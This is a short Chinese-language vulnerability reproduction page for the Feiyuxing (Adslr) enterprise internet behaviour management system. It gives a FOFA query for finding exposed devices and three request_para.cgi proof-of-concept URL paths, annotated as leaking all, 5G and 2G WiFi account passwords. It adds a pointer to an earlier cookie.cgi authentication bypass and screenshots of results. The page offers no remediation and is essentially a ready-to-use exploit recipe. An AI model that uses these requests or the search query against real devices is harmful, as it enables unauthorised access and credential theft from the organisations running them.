# 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞

## 漏洞描述

飞鱼星 企业级智能上网行为管理系统 存在权限绕过以及信息泄露漏洞，可以获取管理员权限以及用户密码

## 漏洞影响

> [!NOTE]
>
> 飞鱼星 企业级智能上网行为管理系统

## FOFA

> [!NOTE]
>
> title="飞鱼星企业级智能上网行为管理系统"

## 漏洞复现

权限绕过参考上一篇 **飞鱼星 家用智能路由 cookie.cgi 权限绕过**

信息泄露POC

```
/request_para.cgi?parameter=wifi_info 		 #获取ALL WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码
```

![](http://wikioss.peiqi.tech/vuln/fy-4.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

## Goby & POC

> [!NOTE]
>
> Adslr Enterprise online behavior management system Information leakage

![](http://wikioss.peiqi.tech/vuln/fy-5.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)